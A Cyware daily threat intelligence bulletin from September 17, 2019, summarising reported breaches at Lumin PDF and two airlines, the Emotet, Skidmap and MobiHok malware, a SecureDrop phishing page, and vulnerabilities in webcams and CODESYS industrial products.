Go to listing page

Cyware Daily Threat Intelligence, September 17, 2019

Cyware Daily Threat Intelligence, September 17, 2019

Share Blog Post

After lying dormant for nearly four months, Emotet is back in an active spam distribution campaign. Security experts have unearthed multiple malicious emails that contain templates written in German, Polish or Italian. The malicious email is sent in English as well with the subject line ‘Payment Remittance Advice’. Once executed, the trojan attempts to spread laterally across the network, apart from stealing passwords from installed applications.

Two new malware that are capable of infiltrating Linux machines and Android phones were also discovered in the past 24 hours. The two malware are Skidmap and MobiHok RAT respectively. While Skidmap is installed via crontab, MobiHok RAT is offered for sale on a prominent English hacking forum.

Two databases, one with 21 million records and the other with 14 million entries, have been circulating on various data exchange forums for at least a month. Most of these entries were created in May 2019, mainly for Malindo Air and Thai Lion Air.

The past 24 hours also saw the discovery of a significant number of vulnerable private web-connected cameras that are prone to be accessed remotely by attackers. The affected devices include the likes of AXIS net cameras, Cisco Linksys webcam, IP Camera Logo Server, IP WebCam, and WebCamXP 5, among others.

Top Breaches Reported in the Last 24 Hours

24.3 million Lumin PDF users affected
Details of over 24.3 million Lumin PDF users have been shared on a hacking forum. The incident has occurred due to a MongoDB database that was left exposed online without a password back in April 2019. This enabled the hacker to download a 2.25GB ZIP file that included a 4.06GB CSV file containing the user records of 24,386,039 Lumin PDF users.

Thai Lion Air and Malindo Air data breach
Two popular airlines - Thai Lion Air and Malindo Air have exposed around 35 million records due to unsecured databases. The leaked details include passenger and reservation IDs, physical addresses, phone numbers, email addresses, names, dates of birth, phone numbers, passport numbers, and passport expiration dates. The two databases have been dumped on multiple forums that are linked to an open AWS bucket discovered on August 10, 2019.
Top Malware Reported in the Last 24 Hours

Emotet trojan returns
The notorious Emotet trojan has made a comeback after a four months hiatus. The malware has been observed in a new spam campaign that is carried out through phishing emails. The emails contain templates written in four languages - German, Polish, Italian and English. The phishing email written in the English template goes with a subject line ‘Payment Remittance Advice’.

Skidmap malware
Skidmap is a newly discovered malware that affects Linux machines. It hides its malicious activities by displaying fake network traffic stats. The malware uses LKM rootkits to overwrite or modify parts of the kernel while conducting its cryptocurrency mining operations under the radar. The malware installs itself via crontab.

MobiHok Android malware
A new piece of Android malware named MobiHok RAT has been spotted by researchers. The malware borrows its code from the old SpyNote RAT. The malware is offered for sale on a prominent English hacking forum. It is sold by a threat actor named mobeebom. MobiHok is written in Visual Basic .NET and Android Studio.

Fraudulent purchase of digital certificates
A new threat actor has been found duping certificate authorities to purchase digital certificates that can be used to spread malware. These certificates are then sold to potential buyers on the black market. Researchers have discovered that these legitimate digital certificates are bought by the threat actor impersonating a company’s executive.

A phishing attack on SecureDrop site
A phishing page that impersonated the SecureDrop for The Guardian was found being used to harvest the unique ‘codename’ from sources who submitted information using the service. The phishing page also promoted an Android app that allowed attackers to perform a variety of malicious activities on a victim’s device. This includes monitoring executing malicious commands and monitoring a victim’s location, call, text, and data.

Top Vulnerabilities Reported in the Last 24 Hours

Vulnerable webcams
Over 15,000 potential accessible webcams have been found to be vulnerable to authentication bypass vulnerability. Researchers have uncovered that settings of many of them can be manipulated, while some can be hacked using standard default credentials to obtain admin-level access. The affected devices include AXIS net cameras, Cisco Linksys webcam, IP Camera Logo Server, IP WebCam, Mega-Pixel IP Camera, and Mobotix.

Vulnerabilities in CODESYS industrial products
The CODESYS industrial products, manufactured by the Germany-based company 3S-Smart Software Solutions, was found riddled with several critical and high-severity vulnerabilities. A critical vulnerability, situated in a gateway component of the CODESYS V3 automation platform, affected the products CODESYS Control, Gateway V3, and V3 Development System. A flaw in another V3 component could give an attacker access to PLC traffic to gather user credentials, and another flaw could result in a DoS condition.


lumin pdf users
skidmap malware
emotet trojan
mobihok android malware

Posted on: September 17, 2019

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.